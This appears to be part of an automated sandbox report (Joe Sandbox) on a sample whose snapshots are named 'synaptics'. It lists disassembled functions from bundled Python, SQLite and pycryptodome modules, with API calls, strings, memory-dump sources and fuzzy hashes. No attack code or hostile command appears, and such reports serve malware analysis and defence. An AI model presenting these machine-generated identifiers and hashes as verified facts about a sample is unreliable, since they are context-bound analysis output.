                                                                                                                                                                                                                • Part of subcall function 6BF4BDF7: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,6BF42282,0000000C), ref: 6BF4BE0C
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(00000000,0000000C), ref: 6BF418C6
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF418CD
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6BF418DA
                                                                                                                                                                                                              • InitializeAcl.ADVAPI32(?,?,?), ref: 6BF418E7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$InitializeReferencememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 912947184-0
                                                                                                                                                                                                              • Opcode ID: 5e8354aef5256e4388008d989544c7246d9503ee10165fbbfcf1484a676538ac
                                                                                                                                                                                                              • Instruction ID: 6a62a7dac56ea956980a7a9199f495eca7aef894d94def136d6a408d899c570e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e8354aef5256e4388008d989544c7246d9503ee10165fbbfcf1484a676538ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11F05E72550240ABDB10AF69DC89F9BBF68EB9A711F444499F90886127C7349819CBB1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310 ref: 6BF47BCC
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF47BD7
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,?,?), ref: 6BF47BEE
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6BF47BFF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Referencemallocmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1282408338-0
                                                                                                                                                                                                              • Opcode ID: 3a1846e32983b03d5d3d7f1dc9d37154aa5eef4c825956c839902ca2ab5c4faf
                                                                                                                                                                                                              • Instruction ID: 8d1cfb5d439d24ee8ab570709bb718a33a4764f9be71000952534570aefb7f18
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a1846e32983b03d5d3d7f1dc9d37154aa5eef4c825956c839902ca2ab5c4faf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63E02BB3A103115BD708AB68FC09C6B7B6CEBE2612B04483EF540C3316E664AC1983F1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6BF4CA2B
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BF4CA3A
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 6BF4CA43
                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6BF4CA50
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                              • Opcode ID: 3cd157cb4e577dac081a74c3155528ecd21b312d30ffd50e5f6076ba47c7752f
                                                                                                                                                                                                              • Instruction ID: ce0187e6aaa7744c3694c365f7ba80dbe924baa9733c038a3a7a8ff655dce3e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cd157cb4e577dac081a74c3155528ecd21b312d30ffd50e5f6076ba47c7752f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDF0AF70C20208EBCF04EBB0C549B9EBBF8FF29205F514895D412E7111D734EB088B51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310 ref: 6BF439BC
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF439C7
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6BF439D4
                                                                                                                                                                                                              • InitializeAcl.ADVAPI32(?,?,?), ref: 6BF439E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeReferencemallocmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 306314696-0
                                                                                                                                                                                                              • Opcode ID: 4ab525c5670a98d1307f0e94f8f28f1729b1d7a0b0e912fdae595272e8d699e2
                                                                                                                                                                                                              • Instruction ID: 6b7dd5fcd708101bdeffa733db67d4b926c55ca105967485b38d39ea0db5bc2b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ab525c5670a98d1307f0e94f8f28f1729b1d7a0b0e912fdae595272e8d699e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2E09272511211ABC700AB1ADC08E87FE68FFA6211F04481AF51482126C7309424C7B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Py_IsInitialized.PYTHON310 ref: 6C0A9123
                                                                                                                                                                                                              • Py_Initialize.PYTHON310 ref: 6C0A912D
                                                                                                                                                                                                              • PyGILState_Ensure.PYTHON310 ref: 6C0A9135
                                                                                                                                                                                                              • PyGILState_Release.PYTHON310(00000000,?), ref: 6C0A914E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: State_$EnsureInitializeInitializedRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2621580956-0
                                                                                                                                                                                                              • Opcode ID: dcab6b718413d39012c99d07fc1536f664b3c199589b420b543cbd3fee9458dd
                                                                                                                                                                                                              • Instruction ID: 1f5e76a7bec950d32f7fad7c84f0df0fcf0303304510f54b9fcfd2b92568cda6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcab6b718413d39012c99d07fc1536f664b3c199589b420b543cbd3fee9458dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8E048713045555B8B009FE5DD48A8E7BB9DF856557044125FA05D3200DE31941687A4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(00000000,?,?,6BF46CF8), ref: 6BF47C1C
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 6BF47C29
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF47C32
                                                                                                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 6BF47C44
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CopyLengthReferencemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3624451276-0
                                                                                                                                                                                                              • Opcode ID: 0399bc8c3acada29673c49fca6df4f4742b757d21e4fc0617c2fc3f3229590d7
                                                                                                                                                                                                              • Instruction ID: d8679e232a3c944abb93f0880b87f26ed73f2daf7f313fa4838abfbea64b427a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0399bc8c3acada29673c49fca6df4f4742b757d21e4fc0617c2fc3f3229590d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AE048B1421110AFFB046F58AC4C9577B58FF15225B04C035F919C5126D731C928C6B6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6BF4A047
                                                                                                                                                                                                              • PyThreadState_Delete.PYTHON310(00000000), ref: 6BF4A05B
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 6BF4A06C
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 6BF4A073
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DeleteFreeLocalState_Thread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3706641815-0
                                                                                                                                                                                                              • Opcode ID: 2bff9766dbfdf8ec4542b3d711c31065b758959940f54e21e19ba469d3dd7b52
                                                                                                                                                                                                              • Instruction ID: dedf3b5651291360d1141fc85cbc08ce905c85da98e115c202d713c06b117430
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bff9766dbfdf8ec4542b3d711c31065b758959940f54e21e19ba469d3dd7b52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDE04636421610DBDF22AF2CE808B453FF4FB22355F104524E5529127AC735C828CA92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6BF4A157
                                                                                                                                                                                                              • PyThreadState_Delete.PYTHON310(00000000), ref: 6BF4A16B
                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 6BF4A17C
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 6BF4A183
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DeleteFreeLocalState_Thread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3706641815-0
                                                                                                                                                                                                              • Opcode ID: 3feded9f1d4eca7a0a162f6900097ff3170f8c9eb2ac5b74d8bdfbead5d0dd95
                                                                                                                                                                                                              • Instruction ID: 6b0a3e728f89c986023318bfff2ef5b5e0c36ac9ec1f4090752e30679bff38c5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3feded9f1d4eca7a0a162f6900097ff3170f8c9eb2ac5b74d8bdfbead5d0dd95
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9E0EC32421610EBDF266B68E808B453FA5FB17751F104568F5569117AC725C829CE91
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: out of memory$statement aborts at %d: [%s] %s
                                                                                                                                                                                                              • API String ID: 0-4133732515
                                                                                                                                                                                                              • Opcode ID: 89666d0707fda9a24ba521910161ea792597d82b7c470c05cdeeed63fe36d148
                                                                                                                                                                                                              • Instruction ID: a1abdbd7eb24f6603840e01df402bebf4f8b05987e4a0533d7a930c71bc666ff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89666d0707fda9a24ba521910161ea792597d82b7c470c05cdeeed63fe36d148
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16818C74D056058FDB14CFA8C480BADB7F2AF48318F288159D8696BB91C735BD87CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i <= tw,D:\a\pycryptodome\pycryptodome\src\bignum.c,00000076), ref: 6BF848A1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • i <= tw, xrefs: 6BF8489C
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\bignum.c, xrefs: 6BF84897
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassert
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\bignum.c$i <= tw
                                                                                                                                                                                                              • API String ID: 3234217646-1841577201
                                                                                                                                                                                                              • Opcode ID: 2c4787a3d833e9994e333ea6ca4c20c5be49e53b3362935dcaa430f076b681ad
                                                                                                                                                                                                              • Instruction ID: 8392485bb2f8d883a7381101c48ce7473a8d23c9ce661186a54b9babdb5e680a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c4787a3d833e9994e333ea6ca4c20c5be49e53b3362935dcaa430f076b681ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4515832A193458FC354CE5CD98065AF7F6BFC9748F598A6DF48893221E77998808B82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,NULL pointer access), ref: 6C0A70E1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String
                                                                                                                                                                                                              • String ID: NULL pointer access
                                                                                                                                                                                                              • API String ID: 1450464846-2985229121
                                                                                                                                                                                                              • Opcode ID: 61f4a1b8494b91efd64c79fc81ed291d1ec26a8141cf6ace48dcd13c98031987
                                                                                                                                                                                                              • Instruction ID: f2cbc0194bdef0b68da3b9c530673af92d429235f8c25fffacf0a371796f01e3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61f4a1b8494b91efd64c79fc81ed291d1ec26a8141cf6ace48dcd13c98031987
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4131E1317016049BDB10CADCD881BA9B3F8EB44A55F2485A9ED5DD7B06EB32E852CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B59C0), ref: 6C0A63B6
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7EA174,invalid index), ref: 6C0A6407
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_StringSubtypeType_
                                                                                                                                                                                                              • String ID: invalid index
                                                                                                                                                                                                              • API String ID: 468607378-607447584
                                                                                                                                                                                                              • Opcode ID: 16f6ce79b6614e58d095001b7dff9ce22a38550a1d4e59c1bd8e199e4567bfd3
                                                                                                                                                                                                              • Instruction ID: d2a2f05dcb5ec0f8d3905adf5ca03fc67dc3232dea52e70438f21388658ece72
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16f6ce79b6614e58d095001b7dff9ce22a38550a1d4e59c1bd8e199e4567bfd3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61319572A092049FD700CF8DD881B9977F9FB45229F1482AAE90DDBA02D773E857C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0(<Error getting traceback - getvalue() did not return a string>), ref: 6BF4B9EE
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF4BA82
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • <Error getting traceback - getvalue() did not return a string>, xrefs: 6BF4B9ED
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeMem__wcsdup
                                                                                                                                                                                                              • String ID: <Error getting traceback - getvalue() did not return a string>
                                                                                                                                                                                                              • API String ID: 3052899371-3958935380
                                                                                                                                                                                                              • Opcode ID: 69d00a2e21069844ae4417473cc29a137b92cbb7f712aaa12c9c08d1b5b10ba0
                                                                                                                                                                                                              • Instruction ID: 30e3dfd20d38bc6e919b102323539f46556f592cf644dbaeafac06b5ff1fe4bf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69d00a2e21069844ae4417473cc29a137b92cbb7f712aaa12c9c08d1b5b10ba0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA1163B2D043415BE600DA74AC4469FBBA49E41734F040FA4EC75922F3E73DE51D9662
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_mprintf.SQLITE3(DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';,?,?,?,?,?,?), ref: 6C192C29
                                                                                                                                                                                                                • Part of subcall function 6C0C83E0: sqlite3_initialize.SQLITE3 ref: 6C0C83E3
                                                                                                                                                                                                              • sqlite3_exec.SQLITE3(?,00000000,00000000,00000000,00000000), ref: 6C192C50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 6C192C24
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                                                                              • String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
                                                                                                                                                                                                              • API String ID: 4141184338-2071071404
                                                                                                                                                                                                              • Opcode ID: bdc3823f247ccadefbbd2e2d598b8102ca21bfb785860e0302d02c71a2caa239
                                                                                                                                                                                                              • Instruction ID: b380414992968fb6f0cdaebbc9e1c0220f0369ee62bf072e6d052c434ed9aff2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdc3823f247ccadefbbd2e2d598b8102ca21bfb785860e0302d02c71a2caa239
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE1101B1702100ABEB005B69EC4DFAA73BCEB42218F040226FC09C2A40EB24B851D7E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000,00000000), ref: 6C0A494D
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,abstract class,?,?,6C0A1A7D,?,00000000,00000000), ref: 6C0A496E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocErr_String
                                                                                                                                                                                                              • String ID: abstract class
